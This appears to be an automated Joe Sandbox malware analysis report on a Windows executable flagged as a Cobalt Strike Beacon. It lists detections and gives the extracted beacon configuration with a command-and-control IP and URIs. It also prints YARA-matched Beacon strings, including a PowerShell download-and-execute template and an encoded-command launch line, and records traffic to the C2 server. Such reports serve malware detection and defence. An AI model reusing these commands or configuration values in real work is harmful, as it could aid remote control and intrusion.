Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2VsJzzWTpA.exe

Overview

General Information

Sample name:2VsJzzWTpA.exe
renamed because original name is a hash value
Original sample name:791bbe51360bb7afbe10c8daf7ad6b5c.exe
Analysis ID:1582935
MD5:791bbe51360bb7afbe10c8daf7ad6b5c
SHA1:8f6382479337d8dc829865d72ba6ea02144e0d92
SHA256:879a5b13745db634a276624a5c476ede618ba844da42d3ec614aafc45051d474
Tags:CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2VsJzzWTpA.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\2VsJzzWTpA.exe" MD5: 791BBE51360BB7AFBE10C8DAF7AD6B5C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 5045, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "134.175.121.153,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
    00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
      00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.2VsJzzWTpA.exe.660000.2.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        0.2.2VsJzzWTpA.exe.660000.2.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          0.2.2VsJzzWTpA.exe.660000.2.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
          • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x32d6a:$a11: Could not open service control manager on %s: %d
          • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x33255:$a15: could not create remote thread in %d: %d
          • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33203:$a17: could not write to process memory: %d
          • 0x32d9b:$a18: Could not create service %s on %s: %d
          • 0x32e24:$a19: Could not delete service %s on %s: %d
          • 0x32c89:$a20: Could not open process token: %d (%u)
          0.2.2VsJzzWTpA.exe.660000.2.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
          • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
          0.2.2VsJzzWTpA.exe.660000.2.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
          • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          Click to see the 40 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-01T02:04:38.651886+010020287653Unknown Traffic192.168.2.449730134.175.121.1535045TCP
          2025-01-01T02:05:41.997698+010020287653Unknown Traffic192.168.2.452520134.175.121.1535045TCP
          2025-01-01T02:06:43.735723+010020287653Unknown Traffic192.168.2.452760134.175.121.1535045TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-01T02:04:40.182365+010020356511A Network Trojan was detected134.175.121.1535045192.168.2.449730TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: 2VsJzzWTpA.exeAvira: detected
          Found malware configuration
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 5045, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "134.175.121.153,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
          Multi AV Scanner detection for submitted file
          Source: 2VsJzzWTpA.exeReversingLabs: Detection: 86%
          Source: 2VsJzzWTpA.exeVirustotal: Detection: 73%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: 2VsJzzWTpA.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00661184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00661184
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00692020 CryptGenRandom,0_2_00692020

          Compliance

          barindex
          Detected unpacking (creates a PE file in dynamic memory)
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeUnpacked PE file: 0.2.2VsJzzWTpA.exe.660000.2.unpack
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00679220
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00671C30
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 4x nop then sub rsp, 28h0_2_00402314

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 134.175.121.153:5045 -> 192.168.2.4:49730
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: 134.175.121.153
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 134.175.121.153:5045
          Source: global trafficTCP traffic: 192.168.2.4:52489 -> 162.159.36.2:53
          Source: Joe Sandbox ViewASN Name: CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:52520 -> 134.175.121.153:5045
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49730 -> 134.175.121.153:5045
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:52760 -> 134.175.121.153:5045
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownTCP traffic detected without corresponding DNS query: 134.175.121.153
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0066E68C
          Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
          Source: 2VsJzzWTpA.exe, 00000000.00000003.1686785325.0000000003CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308900312.00000000007F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2d42b7044b
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://134.175.121.153/
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://134.175.121.153/Z
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497478511.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://134.175.121.153:5045/load
          Source: 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://134.175.121.153:5045/loadK
          Source: 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308900312.0000000000817000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://134.175.121.153:5045/loadn
          Source: 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://134.175.121.153:5045/loadp

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
          Source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
          Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
          Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
